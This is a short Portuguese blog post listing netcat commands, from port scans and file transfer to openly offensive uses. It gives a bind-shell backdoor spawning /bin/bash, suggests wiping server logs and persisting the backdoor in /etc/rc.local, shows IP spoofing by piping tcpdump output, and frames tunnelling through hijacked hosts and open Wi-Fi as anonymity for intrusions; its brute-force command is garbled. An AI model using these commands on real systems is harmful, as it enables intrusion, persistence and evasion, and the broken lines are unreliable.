Comandos p/ NETCAT

Post by R3 | Post in | Postado em 16:30

O netcat é um software para redes ele faz “N” coisas entre elas abrir portas,scans de portas,ataques brute force,entre outras coisas até mesmo tuneamento vo estar passando uns exemplos.

Scanner de portas com netcat
O exemplo ira mostrar como faz um scaner mais info vide o manual do netcat “man netcat”
#nc –vv ip_alvo 1-6550 (vai scanear da porta 1 até 6550)
Scanner bem barulhento com netcat com modo tcp muito bruto...ja com UDP a coisa muda um poco
#nc –u –vvn –z host 1-300

Se conectando em alguma porta ou serviço pelo netcat
#nc pop.terra.com.br 110 (serviço de e-mail pop3)
#nc host_alvo 21 (entrando via FTP)
Entre outras portas como 23(telnet)...
Para criar um sistema de comunicação equivalente ao comando wall use o comando na máquina 1:
# nc -l -p 12345
onde a flag -p é a porta de comunicação que abriremos em nossa máquina 1.
Na máquina 2 entre com o comando:
# netcat ip-ou-nome-de-maquina1 12345
Com isso será aberta um canal de comunicação através da porta 12345 no qual você poderá usar para mensagens instantaneas ou ainda transferência de arquivas.


• Transferir arquivos entre máquinas:
Digamos que você precisa transferir um arquivo entre uma máquina e outra porém você não possui nenhum serviço client/servidor disponivél para transferência entre as máquinas, você pode usar o NC para transferir estes arquivos exemplo:
Digamos que a máquina 1 possui o arquivo teste.txt no qual deverá transferir para a máquina 2, para isso use o comando na máquina 1:
# netcat -l -p 4000 < teste.txt
Na máquina 2 entre com o comando:
# netcat maquina1 4000 > teste.txt
Ao final da transferência tecle CTRL+C para finalizar.

Backdoor com Netcat
Este exemplo e velho estilo cliente servidor
Servidor #nc –l –p 666 –e /Bin/bash
Cliente #nc host 666
Com isso você pode fazer um shellscript que queime os logs de um Server e depois deixa uma backdoor podendo deixa La no “/etc/rc.local” para toda vez que iniciar o sistema executar o backdoor...

PSpoofing com netcat
Este ataque consiste em simplesmente escutar o trafego em um segmento e redirecionalo para outro host usando o protocolo UDP exemplo:
#tcpdump –l –xX –vvv –tttt | nc –v –s spoofed_ip ip_de_escuta (porta)
Isso requer que você configure o endereço ip para um alias
#ifconfig eth0:N spoofed_ip
Onde N é o alias a ser configurado. Isso irá causar problemas com o host que está sendo spoofed, já que o mesmo endereço IP é propagado por dois hosts na mesma rede. Para executar um spoofing sem causar tantos problemas, use a ferramenta hping.

BruteForce com Netcat
Bem vo ser bem rápido exemplo de obtenção de senha de um host suponto que você já tenha uma lista de nomesou dicionários...
#nc –vv 22 /home/log_brute_force.txt

Tuneamento com Netcat
Aqui caiu num uso que queria até falar em geral tuneamento é muito usado por crackers pois pode garatir 50% de anonimato crackers geralmente fazem tuneamento em laranjas para fazer scans em hosts de grande porte ou de segurança de nível melhor ou até mesmo para fazer invasões,os novos cracker usa uma técnica diferente para anonimato nada mais é do que wardriving para se aproveitar de redes sem wep ou wpa ou com os mesmos para garantir 100% de anonimato,vamos no exemplo de tuneamento com netcat.
Exemplo vitima com SSH:
(túnel)$nc –l servidor:22 –p 1025
(cliente)$ssh túnel_host –p 1025
Finalizando aqui com netcat.

Comentários (0)

Postar um comentário

Parceiros

'create